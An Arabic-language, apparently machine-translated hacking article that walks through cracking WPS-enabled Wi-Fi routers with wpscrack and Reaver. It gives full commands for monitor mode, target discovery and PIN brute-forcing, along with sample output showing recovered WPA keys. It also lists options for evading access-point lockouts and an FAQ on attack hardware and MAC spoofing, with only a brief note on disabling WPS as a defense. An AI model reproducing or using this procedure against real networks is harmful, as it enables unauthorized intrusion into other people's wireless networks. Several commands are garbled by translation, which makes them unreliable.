$ ./wpscrack.py --iface mon0 --client 94:0c:6d:88:00:00 --bssid f4:ec:38:cf:00:00 --ssid testap -v sniffer بدأ المحاولة 00000000 استغرقت المحاولة 0.95 ثانية تحاول 00010009<...>استغرقت محاولة 18660005 1.08 ثانية. تم العثور على محاولة 18670004#. استغرقت محاولة النصف الأول من رقم التعريف الشخصي 1.09 ثانية. استغرقت محاولة 18670011 1.08 ثانية<...>محاولة 18674095# وجدت النصف الثاني من رقم التعريف الشخصي<...>مفتاح الشبكة: 0000 72 65 61 6C 6C 79 5F 72 65 61 6C 6C 79 5F 6C 6F real_really_lo 0010 6E 67 5F 77 70 61 5F 70 61 73 73 70 68 72 61 73 ras 0020 65 5F 67 6F 6F 64 6F 6C 75 63 6B 5F 63 72 61 63 e_good_luck_crac 0030 6B 69 6E 67 5F 74 68 69 73 5F 6F 6E 65king_this_one<...>

كما ترون، تم تحديد النصف الأول من رمز PIN أولاً، ثم النصف الثاني، وفي النهاية أنتج البرنامج مفتاحًا جاهزًا للاستخدام للاتصال بالشبكة اللاسلكية. من الصعب تخيل المدة التي سيستغرقها العثور على مفتاح بهذا الطول (61 حرفًا) باستخدام الأدوات الموجودة مسبقًا. ومع ذلك، فإن wpscrack ليس الأداة المساعدة الوحيدة لاستغلال الثغرة الأمنية، وهذه لحظة مضحكة إلى حد ما: في الوقت نفسه، كان باحث آخر، Craig Heffner من شركة Technical Network Solutions، يعمل على نفس المشكلة. عندما رأى ظهور إثبات المفهوم (PoC) العامل لتنفيذ الهجوم على الإنترنت، قام بنشر الأداة المساعدة Reaver الخاصة به. فهو لا يقوم فقط بأتمتة عملية تحديد WPS-PIN واستخراج مفتاح PSK، ولكنه يوفر أيضًا عددًا أكبر من الإعدادات بحيث يمكن تنفيذ الهجوم ضد مجموعة واسعة من أجهزة التوجيه. بالإضافة إلى ذلك، فهو يدعم عددًا أكبر بكثير من المحولات اللاسلكية. قررنا أن نأخذها كأساس ونصف بالتفصيل كيف يمكن للمهاجم استخدام ثغرة أمنية في بروتوكول WPS للاتصال بشبكة لاسلكية آمنة.

كيف

كما هو الحال مع أي هجوم آخر على شبكة لاسلكية، سنحتاج إلى Linux. هنا لا بد من القول أن Reaver موجود في مستودع التوزيعة المعروفة BackTrack، والتي تتضمن أيضًا برامج التشغيل الضرورية للأجهزة اللاسلكية. لذلك، سوف نستخدمها بالضبط.

الخطوة 0. تحضير النظام

على الموقع الرسمي، يتوفر BackTrack 5 R1 للتنزيل كجهاز افتراضي ضمن برنامج VMware وصورة ISO قابلة للتمهيد. أوصي بالخيار الأخير. يمكنك ببساطة كتابة الصورة على القرص، أو يمكنك استخدام البرنامج لإنشاء محرك أقراص فلاش USB قابل للتمهيد: بطريقة أو بأخرى، بعد التمهيد من مثل هذه الوسيلة، سيكون لدينا على الفور نظام جاهز للعمل دون أي مشاكل غير ضرورية.

دورة مكثفة حول اختراق شبكات الواي فاي

1. WEP (الخصوصية المكافئة السلكية) تبين أن التقنية الأولى لحماية الشبكة اللاسلكية كانت ضعيفة للغاية. يمكنك اختراقه حرفيًا في بضع دقائق باستخدام نقاط الضعف في تشفير RC4 المستخدم فيه. الأدوات الرئيسية هنا هي airodump-ng sniffer لتجميع الحزم والأداة المساعدة aircrack-ng، المستخدمة مباشرة لكسر المفتاح. هناك أيضًا أداة خاصة wesside-ng، والتي تقوم عمومًا باختراق جميع نقاط WEP القريبة تلقائيًا.
2. WPA/WPA2 (الوصول المحمي اللاسلكي)

القوة الغاشمة هي الطريقة الوحيدة للعثور على مفتاح لشبكة WPA/WPA2 مغلقة (وحتى في هذه الحالة فقط إذا كان هناك تفريغ لما يسمى WPA Handshake، والذي يتم بثه عندما يتصل العميل بنقطة وصول).

يمكن أن تستمر القوة الغاشمة لأيام وشهور وسنوات. لزيادة كفاءة البحث، تم استخدام القواميس المتخصصة لأول مرة، ثم تم إنشاء جداول قوس قزح، وظهرت لاحقًا أدوات مساعدة تستخدم تقنيات NVIDIA CUDA وATI Stream لتسريع العملية باستخدام وحدة معالجة الرسومات. الأدوات المستخدمة هي aircrack-ng (القوة الغاشمة باستخدام القاموس)، وcowpatty (باستخدام جداول قوس قزح)، والبيريت (باستخدام بطاقة الفيديو).

الخطوة 1: تسجيل الدخول

تسجيل الدخول وكلمة المرور الافتراضية هي root:toor. بمجرد الدخول إلى وحدة التحكم، يمكنك بدء تشغيل "X" بأمان (توجد مجموعات BackTrack منفصلة - مع كل من GNOME وKDE):

#startx

الخطوة الثانية: تثبيت برنامج Reaver

لتنزيل Reaver، سنحتاج إلى الإنترنت. لذلك، نقوم بتوصيل سلك التصحيح أو تكوين المحول اللاسلكي (القائمة "التطبيقات > الإنترنت > Wicd Network Manager"). بعد ذلك، نقوم بتشغيل المحاكي الطرفي، حيث نقوم بتنزيل أحدث إصدار من الأداة المساعدة من خلال المستودع:

# apt-get update # apt-get install reaver

هنا يجب أن أقول أن المستودع يحتوي على الإصدار 1.3، والذي لم يعمل بشكل صحيح بالنسبة لي شخصيًا. بعد البحث عن معلومات حول المشكلة، عثرت على منشور للمؤلف يوصي بالتحديث إلى أعلى إصدار ممكن من خلال تجميع المصادر المأخوذة من SVN. هذه، بشكل عام، طريقة التثبيت الأكثر عالمية (لأي توزيع).

$ svn الخروج http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps $ cd ./reaver-wps/src/ $ ./configure $ make # make install

لن تكون هناك مشاكل في التجميع ضمن BackTrack - لقد قمت بفحصه شخصيًا. في توزيعة Arch Linux التي أستخدمها، يكون التثبيت أبسط، وذلك بفضل وجود PKGBUILD المقابل:

$ yaourt -S reaver-wps-svn

الخطوة 3. الاستعداد للقوة الغاشمة

لاستخدام Reaver عليك القيام بما يلي:

• قم بتبديل المحول اللاسلكي إلى وضع المراقبة؛
• تعرف على اسم الواجهة اللاسلكية؛
• تعرف على عنوان MAC الخاص بنقطة الوصول (BSSID)؛
• تأكد من تفعيل WPS على هذه النقطة.

أولاً، دعونا نتحقق من وجود الواجهة اللاسلكية في النظام على الإطلاق:

#iwconfig

إذا كان إخراج هذا الأمر يحتوي على واجهة مع وصف (عادةً wlan0)، فهذا يعني أن النظام قد تعرف على المحول (إذا كان متصلاً بالشبكة اللاسلكية لتحميل Reaver، فمن الأفضل قطع الاتصال). لنضع المحول في وضع المراقبة:

# airmon-ng بداية wlan0

يقوم هذا الأمر بإنشاء واجهة افتراضية في وضع المراقبة، وسيتم الإشارة إلى اسمها في إخراج الأمر (عادةً mon0). نحن الآن بحاجة إلى العثور على نقطة الوصول للهجوم ومعرفة BSSID الخاص بها. دعونا نستخدم الأداة المساعدة للاستماع إلى البث اللاسلكي airodump-ng:

#airodump-ngmon0

ستظهر قائمة بنقاط الوصول ضمن النطاق على الشاشة. نحن مهتمون بالنقاط المتعلقة بتشفير WPA/WPA2 ومصادقة مفتاح PSK.

من الأفضل اختيار واحد من الأول في القائمة، لأن التواصل الجيد مع النقطة أمر مرغوب فيه لتنفيذ الهجوم. إذا كان هناك الكثير من النقاط ولا تتناسب القائمة مع الشاشة، فيمكنك استخدام أداة مساعدة أخرى معروفة - Kismet، حيث تكون الواجهة أكثر ملاءمة في هذا الصدد. اختياريًا، يمكنك التحقق في الموقع مما إذا كانت آلية WPS ممكّنة في هذه النقطة. للقيام بذلك، يأتي Reaver مزودًا بأداة الغسيل المساعدة (ولكن فقط إذا أخذته من SVN):

# ./غسل -i mon0

المعلمة هي اسم الواجهة التي تم تحويلها إلى وضع المراقبة. يمكنك أيضًا استخدام الخيار '-f' وتغذية الأداة المساعدة بملف cap تم إنشاؤه، على سبيل المثال، بواسطة نفس airodump-ng. لسبب غير معروف، لم تتضمن حزمة Reaver في BackTrack أداة الغسيل المساعدة. دعونا نأمل أن يتم تصحيح هذا الخطأ بحلول وقت نشر هذه المقالة.

الخطوة 4. تشغيل القوة الغاشمة

يمكنك الآن المتابعة مباشرة للبحث عن رقم التعريف الشخصي. لبدء تشغيل Reaver في أبسط الحالات، لا تحتاج إلى الكثير. كل ما عليك فعله هو تحديد اسم الواجهة (التي قمنا بتحويلها مسبقًا إلى وضع المراقبة) وBSSID الخاص بنقطة الوصول:

# ريفر -i mon0 -b 00:21:29:74:67:50 -vv

يعمل المفتاح "-vv" على تمكين إخراج البرنامج المحسن حتى نتمكن من التأكد من أن كل شيء يعمل كما هو متوقع.

Reaver v1.4 WiFi Protected Setup Attack Tool حقوق الطبع والنشر (ج) 2011، حلول الشبكات التكتيكية، كريج هيفنر [+] في انتظار الإشارة من 00:21:29:74:67:50 [+] مرتبط بـ 00:21:29:74:67:50 (ESSID: linksys) [+] محاولة الدبوس 63979978

إذا كان البرنامج يرسل باستمرار أرقام التعريف الشخصية إلى نقطة الوصول، فهذا يعني أن كل شيء بدأ بشكل جيد، ولم يتبق سوى الانتظار بغباء. قد تستغرق العملية وقتا طويلا. أقصر وقت تمكنت فيه من فرض رقم التعريف الشخصي بالقوة كان حوالي خمس ساعات. بمجرد تحديده، سيخبرك البرنامج بكل سرور بذلك:

[+] محاولة الرقم 64637129 [+] تم كسر المفتاح خلال 13654 ثانية [+] WPS PIN: "64637129" [+] WPA PSK: "MyH0rseThink$YouStol3HisCarrot!" [+] AP SSID: "لينكسيس"

الشيء الأكثر قيمة هنا هو، بالطبع، مفتاح WPA-PSK، والذي يمكنك استخدامه على الفور للاتصال. كل شيء بسيط جدًا لدرجة أنه لا يتناسب مع رأسك.

هل من الممكن الدفاع عن نفسك؟

في الوقت الحالي، هناك طريقة واحدة فقط لحماية نفسك من الهجمات - وهي تعطيل WPS في إعدادات جهاز التوجيه. ومع ذلك، كما اتضح، هذا ليس ممكنا دائما. نظرًا لأن الثغرة الأمنية ليست موجودة على مستوى التنفيذ، بل على مستوى البروتوكول، فلا يجب أن تتوقع تصحيحًا سريعًا من الشركات المصنعة من شأنه أن يحل جميع المشكلات. أقصى ما يمكنهم فعله الآن هو مقاومة القوة الغاشمة قدر الإمكان. على سبيل المثال، إذا قمت بحظر WPS لمدة ساعة واحدة بعد خمس محاولات فاشلة لإدخال رمز PIN، فسيستغرق البحث حوالي 90 يومًا. لكن السؤال الآخر هو: ما مدى سرعة نشر هذا التصحيح لملايين الأجهزة العاملة في جميع أنحاء العالم؟

ترقية ريفر

في HOWTO أظهرنا الطريقة الأبسط والأكثر تنوعًا لاستخدام الأداة المساعدة Reaver. ومع ذلك، يختلف تنفيذ WPS من مصنع لآخر، لذلك في بعض الحالات يلزم تكوين إضافي. سأقدم أدناه خيارات إضافية يمكنها زيادة سرعة وكفاءة البحث عن المفاتيح.

1. يمكنك ضبط رقم القناة ومعرف SSID لنقطة الوصول: # reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
2. الخيار '—dh-small' له تأثير مفيد على سرعة القوة الغاشمة، حيث أنه يحدد قيمة صغيرة للمفتاح السري، وبالتالي تسهيل العمليات الحسابية على جانب نقطة الوصول: # reaver -i mon0 -b 00:01:02: 03:04:05 -vv - -dh-صغير
3. مهلة الاستجابة الافتراضية هي خمس ثوان. إذا لزم الأمر، يمكنك تغييره: # reaver -i mon0 -b 00:01:02:03:04:05 -t 2
4. التأخير الافتراضي بين المحاولات هو ثانية واحدة. ويمكن أيضًا تكوينه: # reaver -i mon0 -b 00:01:02:03:04:05 -d 0
5. قد تقوم بعض نقاط الوصول بحظر WPS لفترة معينة، للاشتباه في تعرضها للاحتيال. لاحظ Reaver هذا الموقف وقام بإيقاف البحث مؤقتًا لمدة 315 ثانية افتراضيًا، ويمكن تغيير مدة هذا الإيقاف المؤقت: # reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
6. ستنهي بعض تطبيقات بروتوكول WPS الاتصال إذا كان رمز PIN غير صحيح، على الرغم من أنه وفقًا للمواصفات، يجب أن تُرجع رسالة خاصة. يتعرف Reaver تلقائيًا على هذا الموقف، ولهذا يوجد خيار "—nack": # reaver -i mon0 -b 00:01:02:03:04:05 --nack
7. يهدف خيار "--eap-terminate" إلى العمل مع نقاط الوصول التي تتطلب إنهاء جلسة WPS باستخدام رسالة EAP FAIL: # reaver -i mon0 -b 00:01:02:03:04:05 --eap -إنهاء
8. قد يعني حدوث أخطاء في جلسة WPS أن نقطة الوصول تحد من عدد محاولات إدخال رمز PIN، أو أنها ببساطة مثقلة بالطلبات. سيتم عرض المعلومات حول هذا على الشاشة. في هذه الحالة، يقوم Reaver بإيقاف نشاطه مؤقتًا، ويمكن ضبط وقت الإيقاف المؤقت باستخدام خيار '--fail-wait': # reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait =360

التعليمات

سؤال: ما هو المحول اللاسلكي المطلوب للقرصنة؟

الإجابة: قبل التجربة، عليك التأكد من أن المحول اللاسلكي يمكن أن يعمل في وضع المراقبة. أفضل طريقة هي التحقق من قائمة الأجهزة المدعومة على موقع مشروع Aircrack-ng. إذا كان هناك سؤال حول أي وحدة لاسلكية للشراء، فيمكنك البدء بأي محول يعتمد على شرائح RTL8187L. يمكن بسهولة العثور على أجهزة دونجل USB على الإنترنت مقابل 20 دولارًا.

سؤال: لماذا تظهر لي أخطاء "المهلة" و"خارج الترتيب"؟

الإجابة: يحدث هذا عادةً بسبب انخفاض قوة الإشارة وضعف الاتصال بنقطة الوصول. بالإضافة إلى ذلك، قد تقوم نقطة الوصول بحظر استخدام WPS مؤقتًا.

سؤال: لماذا لا يعمل انتحال عنوان MAC بالنسبة لي؟

الإجابة: من الممكن أن تقوم بتزوير MAC الخاص بالواجهة الافتراضية mon0، وهذا لن ينجح. يجب عليك تحديد اسم الواجهة الحقيقية، على سبيل المثال، wlan0.

سؤال: لماذا يعمل Reaver بشكل سيئ عندما تكون الإشارة سيئة، على الرغم من أن نفس اختراق WEP يعمل بشكل جيد؟

الإجابة: يحدث اختراق WEP عادةً عن طريق إعادة إرسال الحزم الملتقطة للحصول على المزيد من متجهات التهيئة (IVs) اللازمة لإجراء اختراق ناجح. في هذه الحالة، لا يهم ما إذا كانت أي حزمة قد فقدت أو تعرضت للتلف بطريقة أو بأخرى على طول الطريق. ولكن لمهاجمة WPS، يجب عليك اتباع بروتوكول نقل الحزمة بدقة بين نقطة الوصول وReaver للتحقق من كل رمز PIN. وإذا فقدت بعض الحزمة أو وصلت في شكل غير لائق، فسيتعين عليك إعادة إنشاء جلسة WPS. وهذا يجعل الهجمات على WPS أكثر اعتمادًا على قوة الإشارة. من المهم أيضًا أن تتذكر أنه لمجرد أن المحول اللاسلكي الخاص بك يرى نقطة وصول، فإن هذا لا يعني أن نقطة الوصول تراك. لذلك، إذا كنت المالك السعيد لمحول الطاقة العالية من شبكة ALFA وهوائي بضع عشرات من ديسيبل، فلا تتوقع أن تتمكن من كسر جميع نقاط الوصول التي تم اكتشافها.

سؤال: يرسل Reaver دائمًا نفس رقم التعريف الشخصي (PIN) إلى نقطة الوصول، فما المشكلة؟

الإجابة: تحقق من تنشيط WPS على جهاز التوجيه. يمكن القيام بذلك باستخدام أداة الغسيل المساعدة: قم بتشغيلها وتأكد من وجود هدفك في القائمة.

سؤال: لماذا لا يمكنني الارتباط بنقطة وصول؟

الإجابة: قد يكون هذا بسبب ضعف قوة الإشارة أو لأن المحول الخاص بك غير مناسب لمثل هذا البحث.

سؤال: لماذا أستمر في تلقي أخطاء "تم اكتشاف تقييد المعدل"؟الإجابة: هذا لأن نقطة الوصول قامت بحظر WPS. عادةً ما يكون هذا حظرًا مؤقتًا (حوالي خمس دقائق)، لكن في بعض الحالات يمكنهم فرض حظر دائم (إلغاء الحظر فقط من خلال اللوحة الإدارية). يوجد خطأ واحد مزعج في الإصدار 1.3 من Reaver، والذي بسببه لم يتم الكشف عن إزالة هذه الأقفال. كحل بديل، يقترحون استخدام خيار "—تجاهل الأقفال" أو تنزيل أحدث إصدار من SVN.

سؤال: هل يمكنني تشغيل مثيلين أو أكثر من Reaver في وقت واحد لتسريع هجومي؟

الإجابة: من الناحية النظرية، هذا ممكن، ولكن إذا هاجموا نفس نقطة الوصول، فمن غير المرجح أن تزيد سرعة البحث، لأنها في هذه الحالة محدودة بسبب ضعف الأجهزة الخاصة بنقطة الوصول، والتي تم تحميلها بالكامل بالفعل حتى مع مهاجم واحد. .